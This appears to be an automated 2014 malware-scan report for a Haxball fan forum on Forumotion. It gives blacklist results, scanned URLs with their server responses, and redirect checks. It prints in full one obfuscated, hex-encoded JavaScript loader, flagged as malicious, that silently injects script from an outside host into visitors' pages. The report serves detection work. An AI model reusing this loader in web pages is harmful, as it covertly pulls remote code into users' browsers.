Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haxball-galaxy.forumotion.cc
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://haxball-galaxy.forumotion.cc/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://haxball-galaxy.forumotion.cc/ | 200 OK Content-Length: 82544 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://illiweb.com/rsc/60/frm/lang/en.js | 200 OK Content-Length: 67924 Content-Type: application/x-javascript | clean |
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3868 Content-Type: text/javascript | clean |
http://api.leaguerepublic.com/l/client/api/cs1.js | 200 OK Content-Length: 976 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x679b=["\x6E\x75\x6D\x43\x6F\x64\x65\x53\x6E\x69\x70\x70\x65\x74\x73","\x72\x61\x6E\x64\x6F\x6D","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x70\x69\x2E\x6C\x65\x61\x67\x75\x65\x72\x65\x70\x75\x62\x6C\x69\x63\x2E\x63\x6F\x6D\x2F\x6C\x2F\x6A\x73\x2F\x63\x73\x31\x2E\x68\x74\x6D\x6C\x3F\x63\x73\x3D","\x26\x72\x61\x6E\x64\x6F\x6D\x3D","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];if(window[_0x679b[0]]==undefined){window[_0x679b[0]]=1;} else {window[_0x679b[0]]++;} ;if(window[_0x679b[0]]<=12){var randno=Math[_0x679b[1]]();var el=document[_0x679b[3]](_0x679b[2]);el[_0x679b[4]]=_0x679b[5]+lrcode+_0x679b[6]+randno;el[_0x679b[7]]=_0x679b[8];document[_0x679b[11]](_0x679b[10])[0][_0x679b[9]](el);} ; Antivirus reports:
| ||
http://haxball-galaxy.forumotion.cc/h2-live-stream | 200 OK Content-Length: 29682 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/faq | 200 OK Content-Length: 57030 Content-Type: text/html | clean |
http://illiweb.com/rsc/60/frm/collapsible_faq.js | 200 OK Content-Length: 1103 Content-Type: application/x-javascript | clean |
http://haxball-galaxy.forumotion.cc/search | 200 OK Content-Length: 53111 Content-Type: text/html | clean |
http://illiweb.com/rsc/60/frm/extendedview.js | 200 OK Content-Length: 1445 Content-Type: application/x-javascript | clean |
http://haxball-galaxy.forumotion.cc/memberlist | 200 OK Content-Length: 66994 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/groups | 200 OK Content-Length: 31684 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/register | 200 OK Content-Length: 32591 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/login | 200 OK Content-Length: 31488 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/privmsg?folder=inbox | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 25 Jul 2014 16:33:39 GMT Location: http://haxball-galaxy.forumotion.cc/login?redirect=%2Fprivmsg%3Ffolder%3Dinbox Content-Length: 0 | clean |
http://haxball-galaxy.forumotion.cc/login?redirect=%2fprivmsg%3ffolder%3dinbox | 200 OK Content-Length: 31846 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haxball-galaxy.forumotion.cc
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Jul 2014 16:33:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Fri, 25 Jul 2014 00:00:00 GMT
Last-Modified: Fri, 25 Jul 2014 16:33:25 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET / HTTP/1.1
Host: haxball-galaxy.forumotion.cc
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Jul 2014 16:33:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Fri, 25 Jul 2014 00:00:00 GMT
Last-Modified: Fri, 25 Jul 2014 16:33:25 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Second query (visit from search engine):
GET / HTTP/1.1
Host: haxball-galaxy.forumotion.cc
Referer: http://www.google.com/search?q=haxball-galaxy.forumotion.cc
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: haxball-galaxy.forumotion.cc
Referer: http://www.google.com/search?q=haxball-galaxy.forumotion.cc
Result:
The result is similar to the first query. There are no suspicious redirects found.